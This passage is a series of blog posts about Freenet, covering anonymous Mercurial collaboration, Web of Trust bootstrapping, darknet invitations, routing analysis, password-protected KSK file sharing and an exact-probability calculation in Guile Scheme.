¹: There is a 7% probability that 15 or more IDs could still see it and a 1.2% probability that less than 5 IDs still see it. The probability that only a single ID did not block it yet is just 0.005%. In other words: If 99% of IDs would become inactive and then active again after 10 years, approximately one will need about two years to be seen and most will be detected again within 10 weeks. Therefore this scheme is robust against long-term inactivity.

Summary

This algorithm can give the distributed spam filter in Freenet a constant upper bound in cost without limiting interaction.

A vision for a social Freenet with WoT, FreeTalk and Sone

I let my thought wander a bit around the question how a social Freenet (2.0 ;) ) could look from the view of a newcomer.

I imagine myself installing freenet. The first thing to come up after starting it is the node page. (italic Text in brackets is a comment. The links need a Freenet running on 127.0.0.1 to work)


“Welcome to Freenet, where no one can tell you’re reading”

“Freenet tries hard to project your privacy. Therefore we created a pseudonymous ID for you. Its name is Gandi Schmidt. Visit the [your IDs site] to see a legend we prepared for you. You can use this legend as fictional background for your ID, if you are really serious about staying anonymous.”

(The name should be generated randomly for each ID. A starting point for that could be a list of scientists from around the world compiled from the wikipedia (link needs freenet). The same should be true for the legend, though it is harder to generate. The basic information should be a quote (people remember that), a job and sex, the country the ID comes from (maybe correlated with the name) and a hobby.)

“During the next few restarts, Freenet will ask you to solve various captchas to prove that you are indeed human. Once enough other nodes successfully confirmed that you are human, you will gain write access to the forums and microblogging. This might take a few hours to a few days.”

(as soon as the ID has sufficient trust, automatically activate posting to FreeTalk, Sone and others. Access is delayed to ensure that when people talk they can get answers)

“Note that other nodes don’t know who you are. They don’t know your IP, nor your real identity. The only thing they know is that you exist, that you can solve captchas and how to send you a message.”

“You can create additional IDs at any time and give them any name and legend you choose by adding it on the WebOfTrust-page. Each new ID has to verify for itself that it’s human, though. If you carefully keep them seperate, others can only find out with a lot of effort that your IDs are related. Mind your writing style. In doubt, keep your sentences short. To make it easier for you to stay anonymous, you can autogenerate Name and Legend at random.”

“While your humanity is being confirmed, you can find a wealth of content on the following indexes, some published anonymously, some not. If you want to publish your own anonymous site, see Upload a Freesite. The list of indexes uses dynamic bookmarks. You get notified whenever a bookmarked site (like the indexes below) gets updated.”

“Note: If you download content from freenet, it is being cached by other nodes. Therefore popular content is faster than rare content and you cannot overload nodes by requesting their data over and over again.”

“You are currently using medium security in the range from low to high.”

“In this security level, seperated IDs are no perfect protection of your anonymity, though, since other members might not be able to see what you do in Freenet, but they can know that you use freenet in the first place, and corporations or governments with medium sized infrastructure can launch attacks which might make it possible to trace your contributions and accesses. If you want to disappear completely from the normal web and keep your freenet usage hidden, as well as make it very hard to trace your contributions, to be able to really exercise your right of free speech without fearing repercussions, you can use Freenet as Darknet — the more secure but less newcomer friendly way to use freenet; the current mode is Opennet.”

“To enter the Darknet, you add people you know and trust personally as your darknet friends. As soon as you have enough trusted friends, you can increase the security level to high and freenet will only connect to your trusted friends, making you disappear from the regular internet. The only way to tell that you are using freenet will then be to force your ISP to monitor all traffic coming from your computer.”

“And once transport plugins are integrated, steganography will come into reach and allow masking your traffic as regular internet usage, making it very hard to distinguish freenet from encrypted internet-telephony. If you want to help making this a reality in the near future, please consider contributing or donating to freenet.”

“Welcome to the pseudonymous web where no one can know who you are, but only that you are always using the same ID — if you do so.”

“To show this welcome message again, you can at any time click on Intro in the links.”


What do you think? Would this be a nice way to integrate WoT, FreeTalk, Sone and general user education in a welcome message, while adding more incentive to keep the node running?

PS: Also posted in the Freenet Bugtracker, in Freetalk and in Sone – the last two links need a running Freenet to work.

PPS: This vision is not yet a reality, but all the necessary infrastructure is already in place and working in Freenet. You can already do everything described in here, just without the nice guide and the level of integration (for example activating plugins once you have proven your humanity, which equals enough trust by others to be actually seen).

Anonymous code collaboration with Mercurial and Freenet

Anonymous DVCS in the Darknet.

There is a new Mercurial extension for interaction with Freenet called "infocalypse" (which should keep working after the information apocalypse).

It offers "fn-push" and "fn-pull" as an optimized way to store code in freenet: bundles are inserted and pulled one after the other. An index tells infocalypse in which order to pull the bundles. It makes using Mercurial in freenet far more efficient and convenient.

Real Life Infocalypse
easy setup of infocalypse (script)
distributed, anonymous development

Also you can use it to publish collaborative anonymous websites like the freefaq and Technophob.

And it is a perfect fit for the workflow automatic trusted group of committers.

Otherwise it offers the same features as FreenetHG.


The rest of the article is concerned with the older FreenetHG extension. If you need to choose between the two, use Infocalypse: It’s concept for sharing over Freenet is more robust.


Using FreenetHG you can collaborate anonymously without having to give everyone direct write access to your code.

To work with others, you simply setup a local repository for your own work and use FreenetHG to upload your code automatically into Freenet under your private ID. Others can then access your code with the corresponding public ID, do their changes locally and publish them in their own anonymous repository.

You then pull changes you like into your repository and publish them again under your key.

FreenetHG uses freenet which offers the concept of pseudonymity to make anonymous communication more secure and Mercurial to allow for efficient distributed collaboration.

With pseudonymity you can't find out whom you're talking to, but you know that it is the same person, and with distibuted collaboration you don't need to let people write to your code directly, since every code repository is a full clone of the main repository.

Even if the main repository should go down, every contributor can still work completely unhindered, and if someone else breaks things in his repository, you can simply decide not to pull the changes from him.

What you need

To use FreenetHG you obviously need a running freenet node and a local Mercurial installation. Also you need the FreenetHG plugin for Mercurial and PyFCP which provides Python bindings for Freenet.

  • get FreenetHG (the link needs a running freenet node on 127.0.0.1)
  • alternatively just do

    hg clone static-http://127.0.0.1:8888/USK@fQGiK~CfI8zO4cuNyhPRLqYZ5TyGUme8lMiRnS9TCaU,E3S1MLoeeeEM45fDLdVV~n8PCr9pt6GMq0tuH4dRP7c,AQACAAE/freenethg/1/

Setup a simple anonymous workflow

To guide you through the steps, let's assume we want to create the anonymous repository "AnoFoo".

After you got all dependencies, you need to activate the FreenetHG plugin in your ~/.hgrc file

[extensions]
freenethg = path/to/FreenetHG.py

You can get the FreenetHG.py from the freenethg website or from the Mercurial repository you cloned.

Now you setup your anofoo Mercurial repository:

hg init AnoFoo

As a next step we create some sections in the .hg/hgrc file in the repository:

[ui]

[freenethg]

[hooks]

Now we enter the repository and use the setup wizard

cd AnoFoo
hg fcp-setupwitz

The setup wizard asks us for your username to use for this repository (to avoid accidently breaking our anonymity), the address to our freenet instance and for the path to our repository on freenet.

The default answers should fit. The only one where we have to set something else is the project name. There we enter AnoFoo.

Since we don't yet have a freenet URI for the repository, we just answer '.' to let FreenetHG generate one for us. That's also the default answer.

The commit hook makes sure that we don't commit with another but the selected username.

Also the wizard will print a line like the following:

Request uri is: USK@xlZb9yJbGaKO1onzwawDvt5aWXd9tLZRoSoE17cjXoE,zFqFxAk15H-NvVnxo69oEDFNyU9uNViyNN5ANtgJdbU,AQACAAE/freenethg_test/1/

This is the line others can use to clone your project and pull from it.

And with this we finished setting up our anonymous collaboration repository.

When we commit, every commit will directly be uploaded into Freenet.

So now we can pass the freenet Request uri to others who can clone our repository and setup their own repositories in freenet. When they add something interesting, we then pull the data from their Request uri and merge their code with ours.

Setup a more convenient anonymous workflow

This workflow is already useful, but it's a bit inconvenient to have to wait after each commit until your changes have been uploaded. So we'll now change this basic workflow a bit to be able to work more conveniently.

First step: clone our repositories to a backup location:

hg clone AnoFoo BackFoo

Second step: change our .hg/hgrc to only update when we push to the backup repository, and add the default-push path to the backup repository:

[paths]
default-push = ../BackFoo

[hooks]                                                               
pretxncommit = python:freenethg.username_checker                      
outgoing = python:freenethg.updatestatic_hook                           

[ui]
username = anonymuse

[freenethg]
commitusername = anonymuse
inserturi = USK@VERY_LONG_PRIVATE_KEY/AnoFoo/1/

Changes: We now have a default-push path, and we changed the "commit" hook to an "outgoing" hook which is evoked everytime changes leave this repository. It will also be evoked when someone pulls from this repo, but not when we clone it locally.

Now our commits roll as fast as we're used to from other Mercurial repositories and freenethg will make sure we don't use the wrong username.

When we want to anonymously publish the repository we then simply use

hg push

This will push the changes to the backup and then upload it to your anonymous repository.

And now we finished setting up our reopsitory and can begin using an anonymous and almost infinitely scaleable workflow which only requires our freenet installation to be running when we push the code online.

One last touch: If an upload should chance to fail, you can always repeat it manually with

hg fcp-uploadstatic

Time to go

...out there and do some anonymous coding (Maybe with the workflow automatic trusted group of committers).

Happy hacking!

And if this post caught your interest or you want to say anything else about it, please write a comment.

Also please have a look at and vote for the wish to add a way to contribute anonymously to freenet, to make it secure against attacks on developers.

And last but not least: vote for this article on digg and on yigg.

Answers to “I can't use Freenet”

Short answers to questions from a message in the anonymous Freenet Message System:

Ultra-short answer: Go to https://freenetproject.org/pages/download.html and run the installer. It’s fast and easy.

Now onward to the message:

psst@GdwO… wrote :

ArneBab@-jtT… wrote : Yes. And that’s one of the reasons why we need Freenet: to wrestle back control over our communication channel.

Good luck getting people to use it though.

Yes, that’s something we need to fix. And there’s a lot we can do for that. It’s just a lot of boring work.

Let’s go through your points and see which we could fix:

I can't use Freenet. It's illegal! It isn't? How do you know?

It’s created by a registered tax-exempt charity1, how can it be illegal?

I don't want people to think I'm some kind of paranoid nutjob.

Maybe we should add some quotes from the Guardian on the frontpage, and maybe also quote the CNN news about Freenet as a counterpoint?

»You don't need to be talking to a terror suspect to have your communications data analysed by the NSA. The agency is allowed to travel "three hops" from its targets — who could be people who talk to people who talk to people who talk to you. Facebook, where the typical user has 190 friends, shows how three degrees of separation gets you to a network bigger than the population of Colorado. How many people are three "hops" from you?« — The Guardian in NSA files decoded, 2013.

»There is now no shield from forced exposure. . . The foundation of Groklaw is over. . . the Internet is over« – Groklaw, Forced Exposure (2013-08-20)

»This is the most visible line in the sand for people: Can they see my dick?« — »When your junk was passed by Gmail (to a foreign server), the NSA caught a copy of that.« — John Oliver and Edward Snowden in Last Week Tonight: Government Surveillance, 2015, quoted by engadget in Snowden shows John Oliver how the NSA can see your dick pics.

»there is no central server and no one knows who's using it so it can not be shut down … where there is a message it is likely to find a medium.« — CNN about Freenet, 2005-12-19.

Why don't you grow up, and just accept that you have to be ruled by authority? It's just the way the world works!

Democracy without free press is meaningless. Let’s quote some presidents on this.

»The liberty of the press is essential to the security of freedom in a state: it ought not, therefore, to be restrained in this commonwealth.« — John Adams, 1780, second president of the USA.

»When people talk of the Freedom of Writing, Speaking, or thinking, I cannot choose but laugh. No such thing ever existed. No such thing now exists; but I hope it will exist. But it must be hundreds of years after you and I shall write and speak no more.« — John Adams Letter to Thomas Jefferson (15 July 1817)

»No experiment can be more interesting than that we are now trying, and which we trust will end in establishing the fact, that man may be governed by reason and truth. Our first object should therefore be, to leave open to him all the avenues to truth. The most effectual hitherto found, is the freedom of the press.« — Thomas Jefferson, third president of the USA, in a letter to Judge John Tyler (June 28, 1804)

»Our liberty depends on the freedom of the press, and that cannot be limited without being lost.« — Thomas Jefferson, letter to Dr. James Currie (28 January 1786) Lipscomb & Bergh 18:ii.

»What makes it possible for a totalitarian or any other dictatorship to rule is that people are not informed; how can you have an opinion if you are not informed?« — Hannah Arendt, 1974

»And that is why our press was protected by the First Amendment — the only business in America specifically protected by the Constitution — … to inform, to arouse, to reflect, to state our dangers and our opportunities, to indicate our crises and our choices, to lead, mold, educate and sometimes even anger public opinion.« — John F. Kennedy, 35th president of the united state, Address before the American Newspaper Publishers Association (27 April 1961)

»Without general elections, without freedom of the press, freedom of speech, freedom of assembly, without the free battle of opinions, life in every public institution withers away, becomes a caricature of itself, and bureaucracy rises as the only deciding factor.« — Rosa Luxemburg, Reported in Paul Froelich, Die Russische Revolution (1940).

»A popular Government without popular information, or the means of acquiring it, is but a Prologue to a Farce or a Tragedy, or perhaps both.« — James Madison, fourth president of the USA, in a letter to W.T. Barry (1822-08-04).

»A critical, independent and investigative press is the lifeblood of any democracy.« — Nelson Mandela on freedom of expression, At the international press institute congress (14 February 1994).

»we believe that when governments censor or control information, that ultimately that undermines not only the society, but it leads to eventual encroachments on individual rights as well.« — Barack Obama, 44th president of the USA, in Rangoon, Burma on November 14, 2014

»If in other lands the press and books and literature of all kinds are censored, we must redouble our efforts here to keep them free.« — Franklin D. Roosevelt, 32nd president of the USA, Address to the National Education Association (30 June 1938).

»The liberty of the press is no greater and no less than the liberty of every subject of the Queen.« — Lord Russell of Killowen, Reg. v. Gray (1900), L. R. 2 Q. B. D. 40.

… and many more by Wikiquote: Freedom of the press.

There's no need for Freenet, because nothing is wrong, otherwise my daily commute in my gas guzzler and my TV would be bad, and I like those!

You don’t have to change your life to use Freenet. You do harm yourself quite a bit if you let others control your communication, though. They might make you think your life is bad.

Get a life, you neckbeard.

Let’s play some games on Freenet. We need more fun and life here, that’s true.

Why are you being so distrustful and negative? What are you hiding?

Did you see what they did to Edward Snowden?

If I use it, then I'm helping terrorists blow us up!

If you let terrorists listen in on your communication, you help them scout out their targets!

It's slow!

Let’s not advertise sending movies. Chat over Freenet is nice (FLIP/FLIRCP).

I have to install two programs?

Need to recover flircp and enable it by default. Also advertise node-to-node textmessages (friend-to-friend talk).

Same for Sharesite and Darknet Chat.

I'm not good with computers!

Freenet is easier to install than Starcraft!

im confuse can i install without thinking loll??? I don't care enough to bother.

Yes you can. Most times it actually works.

My computer says it's a dangerous virus!

Need to get fred whitelisted in more anti-virus databases… the new C# based installer should help.

I'm not a hacker!

I don’t break into computers either. And I don’t want others to publish what I tell you in private.

Is there an app for my iPhone?

There is something for your Android: - https://f-droid.org/repository/browse/?fdid=co.loubo.icicle

Can't you just send me the files on Skype?

Sure, but I won’t send anything I wouldn’t also send to the local newspaper. Microsoft has been shown to actually try to use login links sent over skype.

I don't have time for this I have to go to work.

Just try again a few weeks or months later.


Short term solutions (stuff which should take less than 6 months to deploy):

Website

  • put more prominently on front page that Freenet Project Inc. is a registered charity.
  • quote the guardian or so about the importance of secure communication.
  • quote a US president and the UN secretary on the importance of free speech for democracy.
  • quote Edward Snowden.
  • quote someone on the importance of secure communication to fight terrorists.
  • make the download page look easy. Maybe a big button instead of a text-link?
  • link the icicle app on the webpage. With an image.
  • promote the use of node-to-node messages in friend-to-friend mode.
  • ask people every few months to try to invite their friends again. Hey, how about sending another note to your friends today?

Using Freenet

  • get more positive, friendly content on Freenet.
  • play fun games over Freenet.

Freenet development

  • recover flircp. Make flircp and Darknet Chat official. Activated by default.
  • polish the user interface. A lot.

Wrapup

Go to https://freenetproject.org/pages/download.html and run the installer. Send your friends there, too. It’s fast and easy. And gives you a confidential communication channel.

Originally published on random_babcom: my in-Freenet single-page blog.


  1. The Freenet Project Inc is a 501(c)(3) non-profit organization, with the mission "to assist in developing and disseminating technological solutions to further the open and democratic distribution of information". It is registered under EIN 95-4864038. 

Background of Freenet Routing and the probes project (GSoC 2012)

The probes project is a google summer of code project of Steve Dougherty intended to optimize the network structure of freenet. Here I will give the background of his project very briefly:

The Small World Structure

Freenet organizes nodes by giving them locations - like coordinates. The nodes know some others and can send data only to those, to which they are connected directly. If your node wants to contact someone it does not know directly, it sends a message to one of the nodes it knows and asks that one to forward the message. The decision whom to ask to forward the message is part of the routing.

And the routing algorithm in Freenet assumes a small world network: Your node knows many people who are close to you and a few who are far away. Imagine that as knowing many people in your home town and few in other towns. There is mathematical proof, that the routing is very efficient and scales to billions of users - if it really operates on a small world network.

So each freenet node tries to organize its connections in such a way, that it is connected to many nodes close by and some from far away.⁽¹⁾ The structure of the local connections of your own node can be characterized by the link length distribution: “How many short and how many long connections do you have?”

Probes and their Promise

The probes project from Steve is to analyze the structure of the network and the structure of the local connections of nodes in an anonymous way to improve the self-organization algorithm in freenet. The reason is that if the structure of the network is no small world network, the routing algorithm becomes much less efficient.

That in turn means that if you want to get some data on the network, that data has to travel over far more intermediate nodes, because freenet cannot determine the shortest route. And if the data has to travel over more nodes, it consumes more bandwidth and takes longer to reach you. In the worst case it could happen that freenet does not find the data at all.

To estimate the effect of that, you can look at the bar chart The Seeker linked to:

chart

Low is an ideal structure with 16 connections per node, Conforming is the measured structure with about 17 connections per node (a cluster with 12, one with ~25). Ideally we would want Normal with 26 connections per node and an ideal structure. High is 86 connections. The simulated network sizes are 6000 nodes (Small), 18 000 (Normal, as measured), 36 000 (Large). Fewer hops is better.

It shows how many steps a request has to take to find some content. “Conforming” is the actually measured structure. “low”, “normal” and “high” shows the number of connections per node in an optimal network: 16, 26 and 86. The actually measured mean number of connections in freenet is similar to “low”, so that’s the bar with which we need to compare the “confirming” bar to see the effect of the suboptimal structure. And that effect is staggering: By default a request needs about two times as many steps in the real world than it would need in an optimally structured network.

Practically: If freenet would manage to get closer to the optimal structure, it could double its speed and cut the reaction times by factor 2. Without changing anything else - and also without changing the local bandwidth consumption: You would simply get your content much faster.

If we would manage to increase the mean number of connections to about 26 (that’s what a modern DSL connection can manage without too many ill effects), we could double the speed and half the reaction times again (but that requires more bandwidth in the nodes who currently have a low number of connections: Many have only about 12 connections, many have about 25 or so, few have something in between).

Essentially that means we could gain factor 2 to factor 4 in speed and reaction times. And better scaleability (compare the normal and the large network).


Note ⁽¹⁾: Network Optimization using Only Local Knowledge

To achieve a good local connection-structure, the node can use different strategies for Opennet and Darknet (this section is mostly guessed, take it with a grain of salt. I did not read the corresponding code).

In Opennet it can look if it finds nodes which would improve its local structure. If it finds one, it can replaces the local connection, which distorts its local structure the most, with the new connection.

In Darknet on the other hand, where it can only connect to the folks it already knows, it looks for locations of nodes it hears about. It then checks if its local connection would be better if it had that other nodes location. In that case, it asks the other node if it would agree to swap its location with it (without changing any real connections: It only changes the notion where it lives. As if you would swap the flat with someone else but without changing who your friends are. Afterwards both the other one and you live closer to your respective friends).

In short: In Opennet, Freenet changes to whom it is connected in order to achieve a small world structure: It selects its friends based on where it lives. In Darknet it swaps its location with stranges to live be closer to its friends.

AnhangGröße
freenet-probes-size-degree-chart.png13.94 KB

Bootstrapping the Freenet WoT with GnuPG - and GnuPG with Freenet

Intro

When you enter the freenet Web of Trust, you first need to get some trust from people by solving captchas. And even when people trust you somehow, you have no way to prove your identity in an automatic way, so you can’t create identities which freenet can label as trusted without manual intervention from your side.

Proposal

To change this, we can use the Web of Trust used in GnuPG to infer trust relationships between freenet WoT IDs.

Practically that means:

  • Write a message: “I am the WoT ID USK@” (replace with the public key of your WoT ID).
  • Sign that message with a GnuPG key you want to connect to the ID. The signature proves, that you control the GnuPG key.
  • Upload the signed message to your WoT key: USK@/bootstrap/0/gnupg.asc. To make this upload, you need the private key of the ID, so the upload proves, that you control the WoT ID.

Now other people can download the file from you, and when they trust the GnuPG key, they can transfer their trust to the freenet WoT-ID.

Automatic

Ideally all this should be mostly automatic:

  • click a link in the freenet interface and select the WoT ID to have freenet create the file and run your local GnuPG program.
  • Then select your GnuPG key in the GnuPG program and enter your password.
  • Finally check the information to be inserted and press a button to start the upload.

As soon as you have a GnuPG key connected with your WoT ID, freenet should scout all other WoT IDs for gnupg keys and check if the local GnuPG key you assigned to your WoT ID trusts the other key. If yes, give automatic trust (real person → likely no spammer).

Anonymously

To make the connection one-way (bootstrap the WoT from GnuPG, but not expose the key), you might be able to encrypt the message to all people who signed your GnuPG key. Then these can recognize you, but others cannot.

This will lose you the indirect trust in the GnuPG web-of-trust, though.


I hope this bootstrap-WoT draft sounded interesting :)

Happy hacking!

Building the darknet one ref at a time

Freenet Logo: Follow the RabbitBuilding the darknet one ref at a time. That’s what we have to do. If you invite three people⁰ to Freenet and help those of your friends with similar interests to connect¹², and when the people you invited then do the same, we get exponential growth.

⁰: To invite a friend into Freenet, you can send an email like this:
    Let us talk over Freenet, so I can speak freely again.

¹: Helping your friends to connect works as follows:

  1. ask: First ask your friends whether they want to connect to others. Just go to the friends page ( http://127.0.0.1:8888/friends/ ), tick the checkbox next to each of the friends you want to ask and click the drop-down list at the bottom named -- Select action --. Select Send N2NTM to selected peers³ and click Go. A text field opens with which you can send a message to all the peers you selected. I typically ask something like "Hi, do you want to connect via darknet to fellow pirate party members?" (replace "pirate party members" by whatever unites the group of people you’re asking).
  2. noderefs: Go to the friends page in advanced mode ( http://127.0.0.1:8888/friends/?fproxyAdvancedMode=2 ). There you find a link named noderef next to each name. Just download the noderefs of the people who want to connect.
  3. introduction file: Then copy them into a text file and add a short description of each person before the persons noderef.
  4. upload: Now upload that text file. I use freenetupload from pyFreenet for that, but regular insert via the browser ( http://127.0.0.1:8888/insertfile/ ) works as well. When the upload finishes, you’ll find the link on the uploads page ( http://127.0.0.1:8888/uploads/ - see the column key).
  5. message: Go to the friends page again (I’m lazy and use simple mode: http://127.0.0.1:8888/friends/?fproxyAdvancedMode=1 ), tick the checkbox next to each of the friends you want to help connect and click the drop-down list at the bottom named -- Select action --. Select Send N2NTM to selected peers and click Go. A text field opens with which you can send a message to all the peers you selected.
  6. write and send: Write something like "The following link includes the noderefs of people you might want to connect to. Just copy the noderef (from 'identity' to 'End') into the text field on http://127.0.0.1:8888/addfriend/ if you want to connect. If both of you do that, your freenet nodes will connect". Copy the link to the uploaded introduction text file into the text field (below your text) and click Send message.

²: Only connect those with similar interests (who might in the real world meet in a club or at work or who are related by blood or association). This is needed for efficient routing in Freenet.

When free speech dies, we need a place to organize. Let’s build that place.

³: A N2NTM is a Node-To-Node-Text-Message: A confidential message sent between people whose Freenet nodes are connected as friends.

Thanks for this text goes to ts.

De-Orchestrating Freenet with the QUEEN program

So Poul-Henning Kamp thought this just a thought experiment …

In Fosdem2014 Poul-Henning Kamp talked about a hypothetical “Project ORCHESTRA” by the NSA with the goal of disrupting internet security: Information, Slides, Video (with some gems not in the slides).

One of the ideas he mentioned was the QUEEN program: Psy-Ops for Nerds.

I’ve been a contributor to the Freenet Project for several years. And in that time, I experienced quite a few of these hypothetical tactics first-hand.

This is the list of good matches: Disruptive actions which managed to keep Freenet from moving onwards, often for several months. It’s quite horrifying how many there are. Things which badly de-orchestrated Freenet:

  • Steer discussions to/from hot spots (“it can’t be that hard to exchange a text file!” ⇒ noderef exchange fails all the time, which is the core of darknet!)
  • Disrupt consensus building: Horribly long discussions which cause the resolution to be forgotten due to a fringe issue.
  • “Secrecy without authentication is pointless”.
  • “It gives a false sense of security” (if you talor [these kind of things] carefully, they speak to people's political leanings: If it’s not perfect: “No, that wouldn’t do it”. This stopped many implementations, till finally Bombe got too fed up and started the simple and working microblogging tool Sone)
  • “you shouldn’t do that! Do you really know what you are doing? Do you have a PhD in that? The more buttons you press, the more warnings you get” ← this is “filter failed”: No, I don’t understand this, “get me out of that!” ⇒ Freenet downloads fail when the filter failed.
  • Getting people to not do things by misdirecting their attention on it. Just check the Freenet Bugtracker for unresolved simple bugs with completely fleshed out solutions that weren’t realized.
  • FUD: I could be supporting bad content! (just like you do if your provider has a transparent proxy to reduce outgoing bandwidth - or with any VPN, Tor, i2p, .... Just today I read this: « you seriously think people will ever use freenet to post their family holiday photos, favourite recipes etc? … can you envisage ordinary people using freenet for stuff where they don't really have anything to hide? » — obvious answer: I do that, so naturally other people might do it, too.)
  • “Bikeshed” discussions: Sometimes just one single email from an anonymous person can derail a free software project for months!
  • Soak mental bandwidth with bogus crypto proposals: PSKs? (a new key-proposal which could make forums scale better but actually just soaked up half a year of the time of the main developer and wasn’t implemented - and in return, critical improvements for existing forums were delayed)
  • Witless volunteers (overlooking practical advantages due to paranoia, theoretical requirements which fail in the real world, overly pessimistic stance which scares away newcomers, voicing requirements for formal specification of protocols which are in flux).
  • Affect code direction (lot’s of the above - also ensuring that there is no direction, so it doesn’t really work well for anybody because it tries to have the perfect features for everybody before actually getting a reasonable user experience).
  • Code obfuscation (some of the stuff is pretty bad, lots of it looks like it was done in a hurry, because there was so much else to do).
  • Misleading documentation (or outdated or none…: There is plenty of Freenet 0.5 documentation while 0.7 is actually a very different beast)
  • Deceptive defaults (You have to setup your first pseudonym by hand, load two plugins manually and solve CAPTCHAS, before you are able to talk to people anonymously, darknet does not work out of the box, the connection speed when given no unit is interpreted as Bytes/s - I’m sure someone once voiced a reason for that)

Phew, quite a list…

I provided this because naming the problems is an important step towards resolving them. I am sure that we can fix most of this, but it’s important to realize that while many of the points I named are most probably homegrown, it is quite plausible that some of them were influenced from the outside. Freenet was always a pretty high profile project in the crypto community, so it is an obvious target. We’d be pretty naive to think that we weren’t targeted.

And we have to keep this in mind when we communicate: We don’t only have to look out for bad code, but also for influences which make us take up toxic communication patterns which keep us from moving forward.

The most obvious fix is: Stay friendly, stick together, keep honest and greet every newcomer as a potential ally. And call out disrupting behaviour early on: If someone insults new folks or takes up huge amounts of discussion time by rehashing old discussions instead of talking about the way forward - in a way which actually leads to going forward - then say that this is your impression. Still stay friendly: Most of the time that’s not intentional. And people can be affected by outside influences like someone attacking them in other channels, so it would be important to help them recover and not to push them away because their behaviour became toxic for some time (as long as the time investment for that is not overarching).

Overall it’s about keeping the community together despite the knowledge that some of us might actually be aggressors or influenced from the outside to disrupt our work.

Distributed censorship-resistant Wikipedia

Thanks to doublec, there are now distributed censorship-resistant Wikipedia mirrors in Freenet: Distributed Wikipedia Mirrors in Freenet

The current largest mirror is the Simple English Wikipedia (the obvious choice to fight censorship worldwide: it is readable with basic english skills).

With this mirror, information from Wikipedia can be accessed in high-censorship countries:

freenet:USK@m79AuzYDr-PLZ9kVaRhrgza45joVCrQmU9Er7ikdeRI,1mtRcpsTNBiIHOtPRLiJKDb1Al4sJn4ulKcZC5qHrFQ,AQACAAE/simple-wikipedia/0/

To access the site, install Freenet from https://freenetproject.org (or get the installer from someone). If you run it on the default port, you can access the mirror anonymously via the following link:

Censorship-resistant Simple English Wikipedia

To test this without installing Freenet, see

https://freenet.cd.pn/USK@m79AuzYDr-PLZ9kVaRhrgza45joVCrQmU9Er7ikdeRI,1mtRcpsTNBiIHOtPRLiJKDb1Al4sJn4ulKcZC5qHrFQ,AQACAAE/simple-wikipedia/0/
(this one is not anonymous!)

Effortless password protected sharing of files via Freenet

TL;DR: Inserting a file into Freenet using the key KSK@<password> creates an invisible, password protected file which is available over Freenet.

Often you want to exchange some content only with people who know a given password and make it accessible to everyone in your little group but invisible to the outside world.

Until yesterday I thought that problem slightly complex, because everyone in your group needs a given encryption program, and you need a way to share the file without exposing the fact that you are sharing it.

Then I learned two handy facts about Freenet:

  • Content is invisible to all but those with the key
    <ArneBab> evanbd: If I insert a tiny file without telling anyone the key, can they get the content in some way?
    <evanbd> ArneBab: No.

  • You generate a key from a password by using a KSK-key
    <toad_> dogon: KSK@<any string of text> -> generate an SSK private key from the hash of the text
    <toad_> dogon: if you know the string, you can both insert and retrieve it

In other words:

Just inserting a file into Freenet using the key KSK@<password> creates an invisible, password protected file which is shared over Freenet.

The file is readable and writeable by everyone who knows the password (within limits1), but invisible to everyone else.

To upload a file as KSK, just go to the filesharing tab, click “upload a file”, switch to advanced mode and enter the KSK key.

Or simply click here (requires freenet to be running on your computer with default settings).

It’s strange to think that I only learned this after more than 7 years of using Freenet. How many more nuggets might be hidden there, just waiting for someone to find them and document them in a style which normal users understand?

Freenet is a distributed datastore which can find and transfer data efficiently on restricted routes (search for meshnet scaling to see why that type of routing is really hard), and it uses a WebOfTrust for real-life spam-resistance without the need for a central authority (look at your mailbox to see how hard that is, even with big money).

How many more complex problems might it already have solved as byproduct of the search for censorship resistance?

So, what’s still to be said? Well, if Freenet sounds interesting: Join in!


  1. A KSK is writeable with the limit, that you cannot replace the file if people still have it in their stores: You have to wait till it has been displaced or be aware that now two states for the file exist: One with your content and one with the old. Better just define a series of KSKs: Add a number to the KSK and if you want to write, simply insert the next one. 

Exact Math to the rescue - with Guile Scheme

I needed to calculate the probability that for every freenet user there are at least 70 others in a distance of at most 0.01. That needs binomial coefficients with n and k on the order of 4000. My old Python script failed me with an OverflowError: integer division result too large for a float. So I turned to Guile Scheme and exact math.

1 The challenge

I need the probability that within 4000 random numbers between 0 and 1, at least 70 are below 0.02.

Then I need the probability that within 4000 random numbers, at most 5 find less than 70 others to which the distance is at most 0.02.

Or more exactly: I need to find the right maximum length to replace the 0.02.

2 The old script

I had a Python-script lying around which I once wrote for estimating the probability that a roleplaying group will have enough people to play in a given gaming night.

It’s called spielfaehig.py (german for “able to play”).

It just does this:

from math import factorial
fac = factorial
def nük(n, k): 
   if k > n: return 0
   return fac(n) / (fac(k)*fac(n-k))

def binom(p, n, k): 
   return nük(n, k) * p** k * (1-p)**(n-k)

def spielfähig(p, n, min_spieler): 
   try: 
      return sum([binom(p, n, k) for k in range(min_spieler, n+1)])
   except ValueError: return 1.0

Now when I run this with p=0.02, n=4000 and minspieler=70, it returns

OverflowError: integer division result too large for a float

The reason is simple: There are some intermediate numbers which are much larger than what a float can represent.

3 Solution with Guile

To fix this, I rewrote the script in Guile Scheme:

#!/usr/bin/env guile-2.0
!#

(define-module (spielfaehig)
  #:export (spielfähig))
(use-modules (srfi srfi-1)) ; for iota with count and start

(define (factorial n)
  (if (zero? n) 1 
      (* n (factorial (1- n)))))

(define (nük n k)
  (if (> k n) 0
      (/ (factorial n) 
         (factorial k) 
         (factorial (- n k)))))

(define (binom p n k)
  (* (nük n k) 
     (expt p k) 
     (expt (- 1 p) (- n k))))

(define (spielfähig p n min_spieler) 
  (apply + 
         (map (lambda (k) (binom p n k)) 
              (iota (1+ (- n min_spieler)) min_spieler))))

To use this with exact math, I just need to call it with p as exact number:

(use-modules (spielfaehig))
(spielfähig #e.03 4000 70)
;           ^ note the #e - this means to use an exact representation
;                           of the number

; To make Guile show a float instead of some huge division, just
; convert the number to an inexact representation before showing it.
(format #t "~A\n" (exact->inexact (spielfähig #e.03 4000 70)))

And that’s it. Automagic hassle-free exact math is at my fingertips.

It just works and uses less then 200 MiB of memory - even though the intermediate factorials return huge numbers. And huge means huge. It effortlessly handles numbers with a size on the order of 108000. That is 10 to the power of 8000 - a number with 8000 digits.

4 The Answer

42! :)

The real answer is 0.0125: That’s the maximum length we need to choose for short links to get more than a 95% probability that in a network of 4000 nodes there are at most 5 nodes for which there are less than 70 peers with a distance of at most the maximum length.

If we can assume 5000 nodes, then 0.01 is enough. And since this is the number we directly got from an analysis of our link length distribution, it is the better choice, though it will mean that people with huge bandwidth cannot always max out their 100 connections.

5 Conclusion

Most of the time, floats are OK. But there are the times when you simply need exact math.

In these situations Guile Scheme is a lifesaver.

